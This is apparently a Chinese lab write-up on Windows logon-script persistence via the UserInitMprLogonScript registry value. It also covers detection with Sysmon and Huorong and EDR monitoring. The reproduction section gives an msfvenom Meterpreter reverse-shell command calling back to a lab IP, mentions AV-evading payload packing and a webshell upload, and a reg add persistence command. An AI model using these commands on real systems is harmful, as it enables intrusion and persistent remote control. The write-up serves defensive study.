0x01 基础信息

0x02 技术原理

攻击者可能会使用在登录初始化时自动执行的 Windows 登录脚本来建立持久性。Windows 允许在特定用户或用户组登录系统时运行登录脚本。这是通过将脚本路径添加到HKCUEnvironmentUserInitMprLogonScript注册表项来完成的。

对手可能会使用这些脚本在单个系统上保持持久性。根据登录脚本的访问配置，可能需要本地凭据或管理员帐户。

0x03 复现环境

0x04 复现过程

首先先生成一个shellcode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.44.128 lport=12345 --encryptbase64 -f c

然后python制作免杀马，打包成exe

通过模拟web站点漏洞(后台弱口令+上传点)上传webshell

资料列表存在一个文件上传点，我们上传冰蝎4.0的webshell

找到上传的路径：http://192.168.44.130/Public/Uploads/1ndex.php

访问一下，发现状态码200，应该是上传成功了

然后使用冰蝎4.0进行连接

上传exe后门

然后执行

然后进行使用注册表方式添加登录自启动进行权限维持

reg add HKCUEnvironment /v UserInitMprLogonScript /t REG_SZ /d D:phpstudy_proWWWcmsPubliclogon.exe

当系统重启时，自动上线

0x05 检测方法

1. 日志特征

   通过sysmon日志记录，使用注册表方式添加了自启动登录项

   
   

2.攻击特征

使用reg.exe添加注册表时，火绒产生告警，匹配默认的规则库：windows登录脚本

0x06 处置方法与规则编写

1. 处置方法：

   这种类型的攻击技术无法通过预防性控制轻易缓解，因为它基于对系统功能的滥用。当然我们可以安装EDR并且通过几个点进行一个监测规则：

• 监视已执行的命令和参数，这些命令和参数可能会将系统设置配置为在系统启动或登录期间自动执行程序，以保持持久性或在受感染的系统上获得更高级别的特权。

• 监视异常的内核驱动程序安装活动，这些活动可能会将系统设置配置为在系统启动或登录期间自动执行程序，以保持持久性或在受感染的系统上获得更高级别的特权。

• 监视新构建的文件，这些文件可能将系统设置配置为在系统启动或登录期间自动执行程序，以保持持久性或在受感染的系统上获得更高级别的特权。

• 监视对文件所做的更改，这些文件可能将系统设置配置为在系统启动或登录期间自动执行程序，以保持持久性或在受感染的系统上获得更高级别的权限。

• 监视异常的内核驱动程序安装活动，这些活动可能会将系统设置配置为在系统启动或登录期间自动执行程序，以保持持久性或在受感染的系统上获得更高级别的特权。

• 按进程监视 DLL 加载，特别是查找未识别或未正常加载到进程中的 DLL。查找可能由于进程加载恶意 DLL 而导致的异常进程行为。

• 监视 API 调用，这些调用可能会将系统设置配置为在系统启动或登录期间自动执行程序，以保持持久性或在受感染的系统上获得更高级别的权限。

• 作为自动启动程序的可疑程序执行可能会显示为异常进程，与历史数据进行比较以增加对恶意活动的信心，不应孤立地查看数据和事件，而应将其作为一系列行为的一部分，这些行为可能导致其他活动，例如为命令和控制建立网络连接，通过发现和横向移动了解有关环境的详细信息。

• 监视可用于触发自动启动执行的机制的添加，例如注册表的相关添加。

2. 火绒监测规则编写：火绒已自带相关规则库，需要在安全设置勾选此防护选项。

0x07 总结

通过本次实验可知，我们通过注册表添加自启动项进行了权限维持，当然我们安装EDR后可以对该注册表进行监测或拦截，还有其他添加注册表方式，比如添加至HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindowsload以及HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionWindowsload。